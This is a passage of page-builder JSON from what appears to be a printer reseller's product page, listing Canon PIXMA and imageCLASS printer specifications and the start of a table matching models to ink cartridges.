pages<\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><center><\\/center><center><\\/center><center><\\/center><center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><p>&lt;center&gt;[maxbutton id=\\\"11\\\" ]&lt;\\/center&gt;<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p><\\/div><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Printing<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 43ppm<\\/li><li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li><li>FPOT: 6.2secs. (A4)<\\/li><li>Max. paper input capacity: Up to 2,300 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p><\\/div><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 38ppm<\\/li><li>Recommended monthly print volume: 750 - 4,000 pages<\\/li><li>FPOT: 5.5secs. (A4)<\\/li><li>Max. paper input capacity: Up to 900 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY iB4170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5070<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5370<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5470<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E3170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E410<\\/p><\\/td><td 